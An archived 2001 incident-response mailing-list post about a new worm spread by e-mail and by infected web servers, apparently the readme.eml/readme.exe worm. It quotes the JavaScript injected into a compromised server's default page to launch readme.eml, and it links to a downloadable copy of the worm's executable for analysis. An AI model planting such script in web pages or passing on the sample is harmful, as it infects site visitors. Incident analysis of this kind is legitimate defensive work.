The code written in the default page of a compromised server :
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
....
-----Message d'origine-----
De : Jay D. Dyson [mailto:jdysonat_private]
Envoye : mardi 18 septembre 2001 18:21
A : Incidents List
Cc : Vuln Dev
Objet : Re: New "concept" virus/worm?
-----BEGIN PGP SIGNED MESSAGE-----
On Tue, 18 Sep 2001, Joao Gouveia wrote:
> I kept the executables for analysis, if anyone woud like to take a look,
> drop me an email.
Anyone interested in examining the payload can also pick up a copy
at http://www.treachery.net/~jdyson/worms/readme.exe (MD5 hash of the
payload is at http://www.treachery.net/~jdyson/worms/readme.exe.md5).
> So, what I ask is, does anyone know about this worm? I've done a quick
> search for it and couldn't find nothing like it.
It's a two-prong worm. It appears to be primarily disseminated
via e-mail, and then launches its attacks on web hosts upon successful
infection.
- -Jay
( ( _______
)) )) .--"There's always time for a good cup of coffee"--. >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) | = |-'
`--' `--' `-- What doesn't kill us only makes us stronger. --' `------'
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
iQCVAwUBO6dmYLlDRyqRQ2a9AQHrDwQAg2IRpTh5c9hzhk1NTWdR3Ta6lsnmn5rg
KUPnc6lpecvtiaYkPxPTiSuQT4sUndXOfS5eaHn9JagI/bFGcRAWHW1tRFzafU1N
1TX57UiRYo9abt5DBbh7sdIsRrm3nhFaifkzog7yQp46B/GzvzlCeBT/4CeIbgXY
gg1laOKK4AY=
=OrqU
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 12:10:13 PDT